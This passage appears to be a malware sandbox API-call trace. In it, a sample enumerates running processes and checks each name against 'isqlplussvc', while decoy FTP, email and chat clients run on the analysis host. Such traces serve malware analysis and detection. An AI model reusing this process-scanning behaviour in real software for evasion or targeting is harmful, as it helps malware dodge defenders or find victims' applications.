lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0093.670] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0093.670] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="isqlplussvc") returned 0x0 [0093.670] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0093.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.671] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3568700 [0093.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3568700, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0093.671] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0093.671] StrStrIA (lpFirst="3dftp.exe", lpSrch="isqlplussvc") returned 0x0 [0093.671] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0093.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.672] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3569688 [0093.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3569688, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0093.672] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0093.672] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="isqlplussvc") returned 0x0 [0093.672] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0093.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.673] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3568718 [0093.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3568718, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0093.673] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0093.673] StrStrIA (lpFirst="alftp.exe", lpSrch="isqlplussvc") returned 0x0 [0093.673] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0093.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.674] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35684f0 [0093.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x35684f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0093.674] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0093.674] StrStrIA (lpFirst="barca.exe", lpSrch="isqlplussvc") returned 0x0 [0093.674] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0093.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.675] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568478 [0093.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3568478, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0093.675] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0093.675] StrStrIA (lpFirst="bitkinex.exe", lpSrch="isqlplussvc") returned 0x0 [0093.676] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0093.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.676] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568658 [0093.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3568658, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0093.677] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0093.677] StrStrIA (lpFirst="coreftp.exe", lpSrch="isqlplussvc") returned 0x0 [0093.677] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0093.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0093.677] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35479b8 [0093.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x35479b8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0093.678] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0093.678] StrStrIA (lpFirst="far.exe", lpSrch="isqlplussvc") returned 0x0 [0093.678] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0093.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.679] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35686a0 [0093.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x35686a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0093.679] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0093.679] StrStrIA (lpFirst="filezilla.exe", lpSrch="isqlplussvc") returned 0x0 [0093.679] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0093.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.680] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35686b8 [0093.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x35686b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0093.680] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0093.680] StrStrIA (lpFirst="flashfxp.exe", lpSrch="isqlplussvc") returned 0x0 [0093.680] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0093.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.681] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35684d8 [0093.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x35684d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0093.681] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0093.681] StrStrIA (lpFirst="fling.exe", lpSrch="isqlplussvc") returned 0x0 [0093.681] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0093.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.682] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3569428 [0093.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3569428, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0093.682] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0093.682] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="isqlplussvc") returned 0x0 [0093.682] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0093.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.683] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35696a8 [0093.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x35696a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0093.683] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0093.683] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="isqlplussvc") returned 0x0 [0093.683] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0093.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0093.684] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35479a8 [0093.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x35479a8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0093.684] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0093.684] StrStrIA (lpFirst="icq.exe", lpSrch="isqlplussvc") returned 0x0 [0093.684] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0093.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.685] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35685e0 [0093.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x35685e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0093.685] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0093.685] StrStrIA (lpFirst="leechftp.exe", lpSrch="isqlplussvc") returned 0x0 [0093.685] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0093.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.686] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3568628 [0093.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3568628, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0093.686] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0093.686] StrStrIA (lpFirst="ncftp.exe", lpSrch="isqlplussvc") returned 0x0 [0093.686] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0093.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.687] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568670 [0093.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3568670, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0093.687] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0093.687] StrStrIA (lpFirst="notepad.exe", lpSrch="isqlplussvc") returned 0x0 [0093.687] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0093.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.688] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3568688 [0093.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3568688, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0093.688] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0093.688] StrStrIA (lpFirst="operamail.exe", lpSrch="isqlplussvc") returned 0x0 [0093.688] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0093.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.689] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35686d0 [0093.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x35686d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0093.689] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0093.689] StrStrIA (lpFirst="outlook.exe", lpSrch="isqlplussvc") returned 0x0 [0093.689] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0093.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.702] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568508 [0093.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3568508, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0093.702] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0093.703] StrStrIA (lpFirst="pidgin.exe", lpSrch="isqlplussvc") returned 0x0 [0093.703] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0093.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.704] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3568430 [0093.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3568430, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0093.704] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0093.704] StrStrIA (lpFirst="scriptftp.exe", lpSrch="isqlplussvc") returned 0x0 [0093.704] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0093.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.706] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35685b0 [0093.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x35685b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0093.706] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0093.706] StrStrIA (lpFirst="skype.exe", lpSrch="isqlplussvc") returned 0x0 [0093.706] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0093.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.707] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568520 [0093.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3568520, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0093.707] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0093.707] StrStrIA (lpFirst="smartftp.exe", lpSrch="isqlplussvc") returned 0x0 [0093.707] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0093.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.708] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3568538 [0093.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3568538, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 